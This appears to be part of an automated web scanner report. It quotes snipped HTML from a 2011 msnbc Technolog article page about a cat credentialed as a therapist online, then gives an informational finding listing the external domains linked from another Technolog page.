<div id="vine-inlinePhoto__5936454" data-contentId="5936454" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="helenaspopkin/5936454.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5936454.jpg" width="600" height="336" alt="" /><p class="photo_credit">
...[SNIP]...
<p>Weary of "therapist-shopping clients" crowing about the many credentials of cut-rate counselors, and alarmed at how easy it is to obtain such credentials over the Internet, Dr. Eichel launched the "<a href="http://www.dreichel.com/dr_zoe.htm#Zoe follow-up">Cat Credentialing Project</a>
...[SNIP]...
<div id="vine-inlinePhoto__5936378" data-contentId="5936378" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="helenaspopkin/5936378.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5936378.jpg" width="280" height="183" alt="" /><div class="photo_credit_container">
...[SNIP]...
<p>While Oreo may be the very first in her family to obtain a diploma, she's not alone in her species. Fraudulent diplomas among the house pet set are so popular, <a href="http://en.wikipedia.org/wiki/List_of_animals_with_fraudulent_diplomas">there’s even a Wikipedia page that lists the honorees</a>
...[SNIP]...
<p>Learn more about the "Cat Credentialing Project" and how to find a qualified hypnotherapist <a href="http://www.dreichel.com/dr_zoe.htm#Zoe follow-up">on Dr. Eichel's website</a>
...[SNIP]...
<em><a href="http://gizmodo.com/5745108/how-a-cat-named-zoe-earned-several-advanced-degrees-and-became-a-psychotherapist">via Gizmodo</a>
...[SNIP]...
<em>Helen A.S. Popkin writes about the Internet ... a lot. Get your fill of her blather on <a href="http://www.facebook.com/home.php#/profile.php?id=1151660271">Facebook</a> and <a href="http://twitter.com/HelenASPopkin">Twitter</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.msn.com/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink" data-Text="Online degrees qualify cat to be your shrink">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.msn.com/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://sd-strip.newsvine.com/">Steve-1090012</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://red23.newsvine.com/">BigRed23</a>
...[SNIP]...
<div class="normal"><a href="http://REALITYCHCK.newsvine.com/">ROY WILSON-336103</a>
...[SNIP]...
<div class="normal"><a href="http://Leslie2992828.newsvine.com/">Leslie-2992828</a>
...[SNIP]...
<div class="normal"><a href="http://vet4u.newsvine.com/">Vet4u</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://massmom.newsvine.com/">SSM-513390</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MissMe21.newsvine.com/">MissMe21</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://stomachacidmonke.newsvine.com/">Cameron Ford</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star5" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
<a href="#star6" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://trublacque.newsvine.com/">trublacque</a>
...[SNIP]...
<a href="#star7" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Arsgoth.newsvine.com/">Dan H-540362</a>
...[SNIP]...
<div class="normal"><a href="http://MissMe21.newsvine.com/">MissMe21</a>
...[SNIP]...
<a href="#star8" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://tertertert.newsvine.com/">tertertert</a>
...[SNIP]...
<div class="normal"><a href="http://michaeloneal.newsvine.com/">M.O'Neal</a>
...[SNIP]...
<div class="normal"><a href="http://janedoe2992691.newsvine.com/">jane doe-2992691</a>
...[SNIP]...
<div class="normal"><a href="http://Leslie2992828.newsvine.com/">Leslie-2992828</a>
...[SNIP]...
<div class="normal"><a href="http://Smartguy1985.newsvine.com/">Smart guy 1985</a>
...[SNIP]...
<div class="normal"><a href="http://theberni.newsvine.com/">bernie-315125</a>
...[SNIP]...
<div class="normal"><a href="http://Smartguy1985.newsvine.com/">Smart guy 1985</a>
...[SNIP]...
<div class="normal"><a href="http://Leslie2992828.newsvine.com/">Leslie-2992828</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<a href="#star9" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://christinak.newsvine.com/">Christina K</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star10" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://mulligan1-1.newsvine.com/">Mulligan1</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://theberni.newsvine.com/">bernie-315125</a>
...[SNIP]...
<div class="normal"><a href="http://billmcc121.newsvine.com/">billmcc1</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://JonPierson.newsvine.com/">Jon Pierson</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://doggysaywhat.newsvine.com/">doggysaywhat</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://aracfi.newsvine.com/">aracfi</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://GregorVonK.newsvine.com/">Gregor Von K.</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://medalguy.newsvine.com/">Lee-913349</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://WinShear.newsvine.com/">Win Shear</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://dnnash.newsvine.com/">DEN-1189913</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://beanathome.newsvine.com/">beanathome</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://natalie-fl.newsvine.com/">Hot-in-Miami</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://tpuntoni.newsvine.com/">Tina-293371</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://donklaing.newsvine.com/">Laos Deo</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://baja-ahhh.newsvine.com/">Mrs C.-464296</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://thefamily2.newsvine.com/">The Family</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://billmcc121.newsvine.com/">billmcc1</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://matthewterry1.newsvine.com/">Matt Terry</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://luric50.newsvine.com/">Rick-312779</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Burr1.newsvine.com/">Burr-959636</a>
...[SNIP]...
<div class="normal"><a href="http://2million.newsvine.com/">EducatedVoter2</a>
...[SNIP]...
<div class="normal"><a href="http://billmcc121.newsvine.com/">billmcc1</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://Steve442157720.newsvine.com/">Steve44-2157720</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Burr1.newsvine.com/">Burr-959636</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://Cooter2008.newsvine.com/">Cooter2008</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://anker5905.newsvine.com/">Jim-Arizona</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Vicky1790580.newsvine.com/">Vicky-1790580</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Burr1.newsvine.com/">Burr-959636</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Kane2250532.newsvine.com/">Kane-2250532</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://michaelwann.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/MichaelWann">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://technolog2.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg" width="60" height="60" /></a>
...[SNIP]...
from Time and the NYT to the notorious tech blog Gizmodo, where he was features editor for three years. He is not an Apple fanboy, but sometimes he is mistaken for one. You can stalk him on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/wjrothman">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://helenaspopkin.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/HelenASPopkin">Follow on Twitter</a>
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/HelenASPopkin">Become a fan on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://suzanne-choney.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://www.twitter.com/suzannechoney">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://alex-johnson.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://malexj.wordpress.com/">Editor at Large</a>
...[SNIP]...
<li class="follow on twitter"><a href="http://www.twitter.com/MAlexJohnson">Follow on Twitter</a>
...[SNIP]...
<li class="follow on facebook"><a href="http://malexj.tk/6M">Follow on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://redtape.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg" width="60" height="60" /></a>
...[SNIP]...
<div class="avatar"><a href="http://boyle.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/badastronomy/">Bad Astronomy</a>
...[SNIP]...
<li><a href="http://www.collectspace.com/">CollectSpace</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/cosmicvariance/">Cosmic Variance</a>
...[SNIP]...
<li><a href="http://curmudgeons.blogspot.com/">Curmudgeons Corner</a>
...[SNIP]...
<li><a href="http://news.discovery.com/">Discovery News</a>
...[SNIP]...
<li><a href="http://www.dailygrail.com/">The Daily Grail</a>
...[SNIP]...
<li><a href="http://earthsky.org/">EarthSky</a></li><li><a href="http://www.geekpress.com/">GeekPress</a></li><li><a href="http://www.habitablezone.com/space/">Habitable Zone</a>
...[SNIP]...
<li><a href="http://www.hobbyspace.com/">HobbySpace Log</a>
...[SNIP]...
<li><a href="http://www.livescience.com/">LiveScience</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/loom/">The Loom</a></li><li><a href="http://www.nasawatch.com/">NASA Watch</a></li><li><a href="http://www.nasaspaceflight.com/">NASA Spaceflight</a>
...[SNIP]...
<li><a href="http://www.outofthecradle.net/">Out of the Cradle</a>
...[SNIP]...
<li><a href="http://www.scidev.net/">SciDev.net</a></li><li><a href="http://www.scienceblog.com/cms/index.php">Science Blog</a>
...[SNIP]...
<li><a href="http://www.scienceblogs.com/">ScienceBlogs</a>
...[SNIP]...
<li><a href="http://www.signonsandiego.com/news/blogs/science-quest/">Science Quest</a>
...[SNIP]...
<li><a href="http://www.scientificamerican.com/blog/observations/">SciAm Observations</a>
...[SNIP]...
<li><a href="http://seedmagazine.com/">Seed Magazine</a>
...[SNIP]...
<li><a href="http://science.slashdot.org">Slashdot Science</a>
...[SNIP]...
<li><a href="http://www.space.com/">Space.com</a></li><li><a href="http://www.spacedaily.com/">Spaceflight Now</a>
...[SNIP]...
<li><a href="http://spacefellowship.com/">Space Fellowship</a>
...[SNIP]...
<li><a href="http://www.thespacereview.com/">The Space Review</a>
...[SNIP]...
<li><a href="http://www.transterrestrial.com/">Transterrestrial Musings</a>
...[SNIP]...
<li><a href="http://http://www.universetoday.com/">Universe Today</a>
...[SNIP]...
<li><a href="http://www.unmannedspaceflight.com">Unmanned Spaceflight</a>
...[SNIP]...
<li><a href="http://trueslant.com/milesobrien/">Uplink by Miles O'Brien</a>
...[SNIP]...
<li><a href="http://planetary.org/blog">Planetary Society Blog</a>
...[SNIP]...
<li><a href="http://www.sciencenews.org/">Science News</a>
...[SNIP]...
<li><a href="http://www.popularmechanics.com/">Popular Mechanics</a>
...[SNIP]...
<li><a href="http://www.popsci.com/">Popular Science</a>
...[SNIP]...
<li><a href="http://news.sciencemag.org/scienceinsider/">Science Insider</a>
...[SNIP]...
<li><a href="http://nasaengineer.com/">NASAEngineer.com</a>
...[SNIP]...
<li><a href="http://eurekalert.org/">EurekAlert</a></li><li><a href="http://blogs.nature.com/news/thegreatbeyond/">Nature: The Great Beyond</a>
...[SNIP]...
<li><a href="http://www.spacedaily.com/">Space Daily</a>
...[SNIP]...
<li><a href="http://www.spacepolitics.com">Space Politics</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo"><a href="http://www.thecaseforpluto.com/" title="The Case for Pluto"><img src="http://www.thecaseforpluto.com/cover.jpg" width="85" height="129" align="left" border="0" style="padding:0 10px 10px 0;" /></a>Alan Boyle's first book tells the story of Pluto's ups and downs as well as the discoveries of other dwarf planets in our own solar system and even more alien worlds beyond. <a href="http://www.thecaseforpluto.com/" title="The Case for Pluto">Buy "The Case for Pluto" ...</a>
...[SNIP]...
<div class="avatar"><a href="http://wbenedetti.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="follow winda benedetti on twitter"><a href="http://twitter.com/windabenedetti">follow Winda Benedetti on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://toddkenreck.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://ingame.newsvine.com/">In-Game</a>
...[SNIP]...
<li class="todd kenreck on facebook"><a href="http://www.facebook.com/todd.kenreck">Todd Kenreck on facebook</a>
...[SNIP]...
<li class="todd kenreck on twitter"><a href="https://twitter.com/ToddKenreck">Todd Kenreck on twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://athima-chansanchai.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg" width="60" height="60" /></a>
...[SNIP]...
<div class="avatar"><a href="http://rosagolijan.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/rosagolijan-657197656.jpg" width="60" height="60" /></a>
...[SNIP]...
</strong> is a contributing writer at MSNBC.com, a reporter at Gizmodo, and an all-around nice person. You can can stalk her on Twitter--she's <a href="http://twitter.com/#!/rosa">@rosa</a> there--or 'like' her on <a href="http://www.facebook.com/RosaGolijanFanPage">Facebook</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/rosa">Follow on Twitter</a>
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/RosaGolijanFanPage">Become a fan on Facebook</a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.msn.com/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.msn.com/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

17.197. http://technolog.msnbc.msn.com/_news/2011/01/31/5962042-quadriplegic-man-sets-record-for-fastest-hands-free-typing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.msn.com
Path:	/_news/2011/01/31/5962042-quadriplegic-man-sets-record-for-fastest-hands-free-typing

Issue detail

The page was loaded from a URL containing a query string:

http://technolog.msnbc.msn.com/_news/2011/01/31/5962042-quadriplegic-man-sets-record-for-fastest-hands-free-typing?GT1=43001

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://alex-johnson.newsvine.com/
http://aspecial1.newsvine.com/
http://athima-chansanchai.newsvine.com/
http://blogs.discovermagazine.com/badastronomy/
http://blogs.discovermagazine.com/cosmicvariance/
http://blogs.discovermagazine.com/loom/
http://blogs.nature.com/news/thegreatbeyond/
http://boyle.newsvine.com/
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://curmudgeons.blogspot.com/
http://dateline.msnbc.com/
http://earthsky.org/
http://eurekalert.org/
http://hardball.msnbc.com/
http://helenaspopkin.newsvine.com/
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://http/www.universetoday.com/
http://in-michigan-90.newsvine.com/
http://ingame.newsvine.com/
http://kennethcoons3009438.newsvine.com/
http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css
http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23279
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23279
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png
http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23279
http://lib.newsvine.com/chrome/technolog/style.css?v=23279
http://log.newsvine.com/poke.gif?x=0|26&get=c5962042&rand=626256313&do=msnbc.msn.com&ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;50::
http://malexj.tk/6M
http://malexj.wordpress.com/
http://michaelwann.newsvine.com/
http://msn.whitepages.com/
http://mtp.msnbc.com/
http://nasaengineer.com/
http://news.discovery.com/
http://news.sciencemag.org/scienceinsider/
http://nightly.msnbc.com/
http://planetary.org/blog
http://platform.twitter.com/widgets.js
http://pmfphd.newsvine.com/
http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.msn.com/
http://rachel.msnbc.com/
http://redtape.msnbc.com/
http://redtape.newsvine.com/
http://rkeene1.newsvine.com/
http://rosagolijan.newsvine.com/
http://science.slashdot.org/
http://seedmagazine.com/
http://sonnyneu1972.newsvine.com/
http://spacefellowship.com/
http://suzanne-choney.newsvine.com/
http://technolog2.newsvine.com/
http://the-jewel.newsvine.com/
http://theramist.newsvine.com/
http://today.msnbc.com/
http://toddkenreck.newsvine.com/
http://trueslant.com/milesobrien/
http://trulyroxie3.newsvine.com/
http://tv.msnbc.com/
http://twitter.com/
http://twitter.com/HelenASPopkin
http://twitter.com/MichaelWann
http://twitter.com/rosa
http://twitter.com/share
http://twitter.com/windabenedetti
http://twitter.com/wjrothman
http://wbenedetti.newsvine.com/
http://whydoesthishappen.newsvine.com/
http://www.ablenetinc.com/AssistiveTechnology/ComputerAccess/TrackerPro/tabid/826/Default.aspx
http://www.atia.org/i4a/pages/index.cfm?pageid=1
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.collectspace.com/
http://www.dailygrail.com/
http://www.delish.com/
http://www.everyblock.com/
http://www.facebook.com/HelenASPopkin
http://www.facebook.com/RosaGolijanFanPage
http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.msn.com/_news/2011/01/31/5962042-quadriplegic-man-sets-record-for-fastest-hands-free-typing
http://www.facebook.com/technolog
http://www.facebook.com/todd.kenreck
http://www.geekpress.com/
http://www.habitablezone.com/space/
http://www.hobbyspace.com/
http://www.hotmail.com/
http://www.livescience.com/
http://www.nasaspaceflight.com/
http://www.nasawatch.com/
http://www.newsvine.com/
http://www.newsvine.com/_nv/cms/help/newUsers
http://www.newsvine.com/_nv/cms/info/privacyPolicy
http://www.outofthecradle.net/
http://www.polls.newsvine.com/_static/css/0238684eaf143e467a1dd70f7499f653cdc8b2d9.css?v=23279
http://www.polls.newsvine.com/_static/css/7bc02b8822020362d3eef6cf4f1df47f326ddb63.css?v=23279
http://www.polls.newsvine.com/_static/js/007eb2f4e0ab5688a998bec9c2de18c62b55711a.js?v=23279
http://www.polls.newsvine.com/_static/js/7b06da0c3220039feac344caa9644a2be2ffbde5.js?v=23279
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif
http://www.polls.newsvine.com/_vine/images/_/b_posting.gif
http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif
http://www.polls.newsvine.com/_vine/images/__/spinner.gif
